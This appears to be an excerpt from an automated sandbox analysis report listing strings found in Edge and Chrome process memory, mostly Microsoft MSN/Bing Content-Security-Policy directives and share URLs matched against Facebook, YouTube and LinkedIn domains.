Source: msedge.exe, 0000002F.00000002.172807930071.00007B1C0077C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ed-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'strict-dynamic',script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:"( equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172807930071.00007B1C0077C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ed-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'strict-dynamic',script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:"( equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172818611559.00007B1C01260000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172818611559.00007B1C01260000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172531574251.00007B1C0187C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531786449.00007B1C0180C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531443365.00007B1C01798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/sharer.php?u={url}&t={title} equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172531574251.00007B1C0187C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531786449.00007B1C0180C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531443365.00007B1C01798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&source={refererUrl} equals www.linkedin.com (Linkedin)
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381586361.00000C6401438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlndler equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlr7 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172531574251.00007B1C0187C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531786449.00007B1C0180C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531443365.00007B1C01798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: i9https://www.facebook.com/sharer.php?u={url}&t={title} equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172822714876.00007B1C016DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ort-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172822714876.00007B1C016DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ort-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172822714876.00007B1C016DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ort-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/{ equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172822714876.00007B1C016DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ort-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/{ equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172822570098.00007B1C01648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483224572.00007B1C01300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483224572.00007B1C01300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172529567482.00007B1C010A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172529567482.00007B1C010A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: script-src 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172483789808.00007B1C00474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ww.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jg
Source: msedge.exe, 0000002F.00000003.172483789808.00007B1C00474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ww.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jg
Source: msedge.exe, 0000002F.00000003.172483789808.00007B1C00474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ww.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jg
Source: msedge.exe, 0000002F.00000003.172483789808.00007B1C00474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ww.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jg
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172381586361.00000C6401438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172818611559.00007B1C01260000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814610659.00007B1C00EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172818611559.00007B1C01260000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172814610659.00007B1C00EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172812949127.00007B1C00CCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {icu_load_collationchrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.htmlwww.youtube.com equals www.youtube.com (Youtube)
